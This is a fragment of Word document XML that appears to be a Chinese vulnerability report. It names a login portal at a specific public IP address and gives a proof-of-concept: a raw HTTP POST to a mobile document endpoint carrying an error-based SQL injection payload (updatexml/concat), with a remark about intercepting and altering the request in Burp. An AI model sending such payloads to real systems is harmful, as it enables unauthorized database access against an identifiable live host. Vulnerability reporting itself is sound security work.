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漏洞URL：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"http://61.184.79.92:8090/portal/default/login"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spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://61.184.79.92:8090/portal/default/login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olor w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>P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oc：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POST /mobile/document/updateparase HTTP/1.1</w:t>
      </w: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Host: 61.184.79.92:8090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User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F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Content-Type: application/x-www-form-urlencoded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Content-Length: 93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id=123%20or%20updatexml%281%2Cconcat%280x7e%2C%28SELECT%20md5%28123456%29%29%2C0x7e%29%2C1%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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</w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="28155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bp抓包改包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="296227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94703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4437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2024-03-15T05:33:05Z</dcterms:created>
  <dc:creator>86132</dc:creator>
  <cp:lastModifiedBy>㉨</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-15T05:34:29Z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8845CF0968DD48C2BC4C8FB36915EF6F_12</vt:lpwstr>
  </property>
</Properties>
</file>